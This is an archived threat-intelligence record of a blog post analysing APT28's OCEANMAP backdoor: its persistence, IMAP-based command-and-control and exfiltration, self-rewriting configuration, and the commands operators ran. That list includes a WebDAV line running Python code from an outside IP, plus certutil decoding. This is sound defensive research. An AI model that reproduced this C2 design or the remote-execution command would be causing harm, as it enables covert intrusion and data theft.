{ "id": "46730448-4a0d-4439-afe0-1453fb358950", "created_at": "2026-04-06T00:20:19.693918Z", "updated_at": "2026-04-10T13:11:52.520136Z", "deleted_at": null, "sha1_hash": "128e23d83c164ebe5edc01dad592487312d40798", "title": "Analyzing APT28’s OCEANMAP Backdoor \u0026 Exploring its C2 Server Artifacts", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1362147, "plain_text": "Analyzing APT28’s OCEANMAP Backdoor \u0026 Exploring its C2 Server\r\nArtifacts\r\nBy knight0x07\r\nPublished: 2024-01-10 · Archived: 2026-04-05 22:07:52 UTC\r\n10 min read\r\nJan 10, 2024\r\nAuthors - knight0x07 \u0026 0x4427\r\nBackground\r\nOn December 28, 2023, CERT-UA released an advisory reporting a cyber attack targeting state organizations attributed\r\nto APT28 aka Fancy Bear - A Russian cyber espionage group. The report detailed the use of a new C# based\r\nbackdoor named “OCEANMAP” in the mentioned campaigns.\r\nIn our following blog post, we conducted an in-depth technical analysis of the OCEANMAP Backdoor and examined\r\nartifacts from the OCEANMAP Command and Control server showcasing the OCEANMAP Backdoor being tested by\r\nthe threat actors on their machine, commands executed by the Threat Actors via OCEANMAP and much more.\r\nOCEANMAP Technical Analysis\r\nFilename: VMSearch.exe\r\nPDB Path: C:\\WORK\\Source\\tgnews\\tgnews\\obj\\x64\\Release\\VMSearch.pdb\r\nUpon execution, the C# based OCEANMAP Backdoor searches for any additional instances of OCEANMAP by looking\r\nfor processes with the current process name. If it detects another process with the same name, it compares the current\r\nprocess’s Process ID to that of the other process. If the process ids do not match, taskkill /F /PID “Process-ID” is used to\r\nterminate the other process.\r\nNext, it determines if “_tmp.exe” is present in the filename of the OCEANMAP backdoor\r\nif yes -\r\nDeletes any OCEANMAP binary without “_tmp” in its filename\r\nCreates a copy of the current OCEANMAP binary, initially identified with “_tmp,” at the same location by\r\nremoving the “_tmp” from the filename\r\nStarts the copied OCEANMAP binary (filename does not have “_tmp”) using Process.Start()\r\nThen exits the application\r\nif no -\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 1 of 10\n\nDeletes the OCEANMAP binary with the filename “_tmp.exe”\r\nPs. The significance of these checks for filenames containing “_tmp.exe” will become evident as the blog progresses.\r\nPress enter or click to view image in full size\r\nFurthermore, the OCEANMAP maintains persistence on the infected machine by creating an Internet Shortcut (.URL\r\nfile) titled “EdgeContext.url” in the StartUp Folder, with the URL parameter containing the file path to the\r\nOCEANMAP binary.\r\n[InternetShortcut]\r\nURL=file:///C:\\\u003cpath_to_OCEANMAP\u003e\r\nIconIndex=0\r\nAs a result as shown above, every time the system restarts, the Internet Shortcut (URL File) “EdgeContext.url’’ is\r\nlaunched from the Startup folder, which finally launches the OCEANMAP from its location.\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 2 of 10\n\nFurther the OCEANMAP performs the following functions -\r\nInitially, it runs the execute(commands) method, passing the hardcoded check-in command “dir” as an argument.\r\nSubsequently, it retrieves further commands from the C2 server (Mail server) through the IMAP Protocol, using an\r\ninfinite loop.\r\nLet’s take a closer look at the execute() method -\r\nThe OCEANMAP leverages the IMAP Protocol to communicate with the C2 server (Mail Server) to further execute\r\ncommands and perform malicious actions on the victim machine.\r\nWithin the execute() method, OCEANMAP initiates by invoking the connect() method. This function aims to establish a\r\nconnection with the C2 server (Mail server) through IMAP on Port 143 over TCP using TcpClient, utilizing two\r\narguments: connect(C2_server, Port_[143]). Upon successful connection, it proceeds to call the Login() method. This\r\nfunction requires two arguments: the email username and password. Subsequently, it runs the IMAP Login command to\r\nthe Mail server (C2) in the following manner using the provided credentials:\r\n$ LOGIN \u003cemail_username\u003e \u003cpassword\u003e\r\nThe C2 server (Mail server) and email credentials are dynamically indexed and parsed, with their configuration stored in\r\nthe following format:\r\nemail_username:email_password:c2_server:0000000000\u003czero_padding\u003e\r\nPress enter or click to view image in full size\r\nHere as shown in the above screenshot, the variables used to store the configuration - “fcreds” represent the first\r\ncredentials, while “screds” denote the second credentials within the configuration. If the login attempt with the\r\ncredentials and C2 server from the “fcreds” fails initially, it then proceeds to try another login attempt using the\r\ncredentials \u0026 c2 server from the “screds”.\r\nOnce a successful login attempt is made with either set of credentials, the execute() method proceeds to parse and\r\nexecute the input commands provided as an argument to the method.\r\nThe OCEANMAP Backdoor consists of three commands -\r\nchangesecond - Update fcreds configuration\r\nIf the command passed to the execute(commands) method from the C2 server by the Threat Actor is -\r\nchangesecondtest@malserver.com:password:malserver.com -changesecond\u003cemail_username\u003e:\r\n\u003cemail_password\u003e:\u003cc2_server\u003e\r\nOCEANMAP checks the received command and executes the change() method if it contains the ‘changesecond’ string.\r\nThe change() method starts by removing the “changesecond” string from the command it receives —\r\n“test@malserver.com:password:malserver.com”\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 3 of 10\n\nAfter removing the “changesecond” string, the change() method passes the modified command to the normal() method.\r\nThis normal() method appends “zero padding” at the end of the command after a “:”. The number of zeros added is\r\ndetermined by subtracting the length of the command from 99.\r\ntest@malserver.com:password:malserver.com:0000000000000000000000000000000000000000000000000000000000\r\nThen, it retrieves the path to the current binary and modifies it by replacing “\u003cfilename\u003e.exe” with\r\n“\u003cfilename\u003e_tmp.exe”. Next, it reads the bytes of the OCEANMAP binary and conducts a search and replace routine\r\nReplaceBytes(), to substitute the “fcreds” with the updated configuration. Following this, it writes the modified\r\nOCEANMAP build with the updated “fcreds” onto the disk using the filename “\u003cfilename\u003e_tmp.exe” as shown in the\r\nbelow screenshot. Subsequently, it launches the binary with the updated configuration using Process.Start() and then\r\nterminates its own execution.\r\nPress enter or click to view image in full size\r\nTherefore, this technique enables the Threat Actor to remotely update the configuration (C2 server and email credentials)\r\nby issuing a command from the Command and Control server (Mail server). It achieves this by creating a new build that\r\nseamlessly communicates with the updated C2 Mail server using new credentials on the fly!\r\nReason for zero-padding: The binary adds extra zeros to the end of the configuration to maintain its length at 100\r\ncharacters. This approach facilitates the search and replace routine by ensuring the complete overwrite of the 100-\r\ncharacter configuration during configuration update routine as explained before. It eliminates reliance on the varying\r\nlengths of credentials or the C2 server, ensuring a standardized update process.\r\nnewtime - Update newtime configuration\r\nNow, if the command passed to the execute() method from the Threat Actor via the C2 server consists of the string\r\n“newtime”, the command would be - newtime4\r\nThe command “newtime4” is subsequently transferred to the previously observed normal() method. Within normal(), it\r\nappends “zero padding” at the end of the command following a “:”. The count of zeros added corresponds to 99 minus\r\nthe length of the command.\r\nnewtime4:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\nThe command, now including zero padding, proceeds to the change_time() method, resembling the earlier-seen change()\r\nmethod. Within change_time(), the “newtime” configuration gets updated with the new command provided by the Threat\r\nActor, utilizing a similar ReplaceBytes() method that conducts a search and replace operation. After updating the\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 4 of 10\n\n“newtime1” configuration to “newtime4”, it saves the binary with this updated configuration as \u003cfilename\u003e_tmp.exe on\r\nthe disk as shown in the below screenshot and executes it using Process.Start.\r\nPress enter or click to view image in full size\r\nSystem command execution\r\nIf neither the “changesecond” nor “newtime” strings match, OCEANMAP directs the received commands from the C2\r\nserver as system commands to the run() method. This method executes the system command by using the commands as\r\na standard input stream (Process.StandardInput) to “cmd.exe”, creating a new process. It then retrieves the output of the\r\nexecuted command by reading Process.StandardOutput.ReadToEnd().\r\nNow, if the output of the executed command doesn’t contain the string “echo,” it’s passed as an argument to the create()\r\nmethod. However, should “echo” be present in the output, the process bypasses the create() method and continues\r\nexecuting any subsequent commands. If no further commands exist, the function returns.\r\nLet’s delve into the create() method, which utilizes the command output as an argument - create(command_output).\r\nThe create() method begins by concatenating system and user information into a full message format along with the\r\ncommand output and the new time configuration.\r\nFrom: U_\u003cusername\u003e\r\nSubject:\u003ccurrent_date_time\u003e_report_\u003cbase64encode(\u003cmachine_name\u003e==\u003cusername\u003e==\u003cos_version\u003e)\u003e\r\n\u003ccommand_output\u003e\r\n\u003cnewtime_configuration\u003e\r\nHere’s the full message generated upon executing the hardcoded check-in command “dir” on the compromised machine:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 5 of 10\n\nFurther the OCEANMAP executes the IMAP “APPEND” command which appends the full message in the format\r\nshown previously to the INBOX folder of the the Mail Server (C2 server) using the IMAP protocol\r\nGet knight0x07’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nCommand:\r\n$ APPEND INBOX {\u003clen_concat_string\u003e} \u003cfull_message\u003e\r\nBelow shown is the command output of command: “dir” been exfiltrated to Command \u0026 Control server via IMAP\r\nProtocol\r\nPress enter or click to view image in full size\r\nThus, in this manner, the OCEANMAP Backdoor utilizes the IMAP APPEND command to systematically exfiltrate\r\ncommand outputs and relevant system/user information to the C2 server (Mail server) using the IMAP Protocol. The\r\nsimilar technique is being used for exfiltrating output of different commands to the C2 server via IMAP.\r\nOCEANMAP’s Command Retrieval Routine from Command \u0026 Control Server\r\nLet’s delve into how the OCEANMAP Backdoor retrieves commands from the C2 Server.\r\nThe OCEANMAP calls the readfile() method which is responsible for handling the retrieval of commands from the C2\r\nserver (Mail server). Here’s how the routine works -\r\nreadFile() method establishes a connection with the C2 server (Mail server) by employing the connect() method\r\non port 143. It then logins using the login() method, a procedure elaborated upon earlier. Throughout this\r\noperation, the fcreds configuration (server \u0026 credentials) is utilized.\r\nSubsequently, it calls the findText() method, which initially executes the following IMAP commands to select the\r\nDrafts folder from the mail server: $ SELECT INBOX.Drafts and $ SELECT Drafts.\r\nIt throws an exception if the draft folder is not present.\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 6 of 10\n\nThen, it proceeds to execute the IMAP command — $ UID SEARCH subject “\u003cnameid\u003e” where \u003cnameid\u003e =\r\n\u003cbase64encode(\u003cmachine_name\u003e==\u003cusername\u003e==\u003cos_version\u003e)\u003e which is transmitted during the command\r\noutput exfiltration as previously described. The UID SEARCH subject command searches for the \u003cnameid\u003e\r\nwithin the Subject parameter.Upon discovering the nameid in the message subjects, it returns an array comprising\r\nthe corresponding UID’s for those particular email messages.\r\nIt proceeds to execute the IMAP command - “$ UID FETCH [uid] BODY.PEEK[text]” with the previously\r\nfetched UIDs. This command reads the message body of the specific email message and then proceeds with\r\nparsing it.\r\nHere the message body consists of the base64 encoded commands, further it reads those commands (line by line\r\nif multiple commands) and then base64 decodes and adds them to an array. This array consisting of the\r\ncommands to be executed are been passed to the execute() method which is responsible for executing those\r\ncommands as explained previously.\r\nAdditionally, it also deletes the messages with the \u003cnameid\u003e by passing the UID’s to the IMAP command - $\r\nUID STORE \u003cuid\u003e FLAGS (\\Deleted) and then using $ EXPUNGE to delete it.\r\nHence, the retrieval of commands from the C2 server occurs as outlined, subsequently these commands are passed to the\r\nexecute() method for execution as previously detailed. This cyclical process of command retrieval and execution\r\noperates within an infinite loop.\r\nFollowing the command execution, OCEANMAP parses the newtime configuration -\r\n“newtime\u003csleep\u003e:000\u003czero_padding\u003e” and then reads the sleep value and then calls - Thread.Sleep(60000 * \u003csleep\u003e)\r\n- where for instance “newtime1” means it sleeps for 60 seconds.\r\nSetup for Command execution from Threat Actors perspective\r\nconnect \u0026 login into the mail server\r\ncreate an email in the Drafts folder\r\nThe subject of the email should contain the \u003cnameid\u003e — \u003cbase64encode(\u003cmachine_name\u003e==\u003cusername\u003e==\r\n\u003cos_version\u003e)\u003e which is been sent in the message when the check-in hardcoded command “dir” in executed in\r\nthe victim machine as explained before.\r\nNow the final stage is that the base64 encoded commands should be placed in the body of the email message.\r\nAPT28’s OCEANMAP C2 Analysis\r\nNow let’s take a look at few of our findings from APT28’s OCEANMAP C2 server artifacts -\r\n1. OCEANMAP Backdoor testing performed by the Threat Actors on their machine\r\nWe discovered instances where the Threat Actors were conducting tests on their machine. We observed command\r\nexecution outputs from their system being sent to the C2 server, as depicted below.\r\n“dir” command output from the Threat Actors machine being sent to the Command \u0026 Control server.\r\nInterestingly, we observed the directory listing of the path “C:\\WORK\\Source\\tgnews\\tgnews\\bin\\” shown in the\r\nscreenshots identified as the PDB path in multiple OCEANMAP samples, alongside the OCEANMAP binary\r\nnamed ‘VMSearch.exe’.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 7 of 10\n\nPress enter or click to view image in full size\r\n“systeminfo” command output from the Threat Actors machine being sent to the Command \u0026 Control server\r\nwhere we would see the testing being performed on Virtual Machines!\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 8 of 10\n\n“ipconfig” command output from the Threat Actors machine being sent to the Command \u0026 Control server.\r\nPress enter or click to view image in full size\r\nWe also found instances where the Threat Actors tested the command execution functionality of the OCEANMAP\r\nBackdoor on their machine, as depicted below. -\r\nThreat Actors testing the Newtime update configuration functionality on their machine — command: “newtime2”\r\nPress enter or click to view image in full size\r\nThreat Actors testing the certutil -decode command as shown in the screenshot below:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 9 of 10\n\n2. List of System Commands executed by the Threat Actor from the Command \u0026 Control server\r\nsysteminfo\r\ntasklist\r\nchcp 65001 \u0026 dir “C:\\WORK\\Source\\tgnews\\tgnews\\bin\\x64\\Release”\r\nnslookup -debug -type=A+AAAA -nosearch \u003cdomain\u003e \u003cip\u003e\r\nipconfig\r\ndir\r\nchcp 65001 \u0026\u0026 cmd /c dir\r\ncertutil -decode C:\\Users\\Jefry\\source\\repos\\client\\client\\bin\\Release\\config.txt\r\nC:\\Users\\Jefry\\source\\repos\\client\\client\\bin\\Release\\config1.txt\r\nnewtime2\r\ndir C:\\\r\n\\\\194[.]126[.]178[.]8@80\\webdav\\Python39\\python.exe \\\\194[.]126[.]178[.]8@80\\webdav\\Python39\\Client.py\r\nchcp 65001 \u0026\u0026 cmd /c tasklist /FI “ImageName eq VMSearch.exe”\r\n3. Threat Actor System Paths\r\nC:\\Users\\Jefry\\Desktop\\testing\\ag1 -\u003e file: fgdh.py\r\nC:\\Users\\Jefry\\source\\repos\\client\\client\\bin\\Release\\config.txt\r\nC:\\WORK\\Source\\tgnews\\tgnews\\bin\\\r\n4. Threat Actor Testing Machine\r\nMachine Name:DESKTOP-DSDK4NU\r\nUsername: Jefry\r\nOS Version:\r\nMicrosoft Windows NT 10.0.19044\r\nIntel64 Family 6 Model 158 Stepping 13, GenuineIntel\r\nMicrosoft Windows NT 6.2.9200.0\r\nClick here to download the PDF version of this blog.\r\nSource: https://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nhttps://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b" ], "report_names": [ "analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434819, "ts_updated_at": 1775826712, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/128e23d83c164ebe5edc01dad592487312d40798.pdf", "text": "https://archive.orkl.eu/128e23d83c164ebe5edc01dad592487312d40798.txt", "img": "https://archive.orkl.eu/128e23d83c164ebe5edc01dad592487312d40798.jpg" } }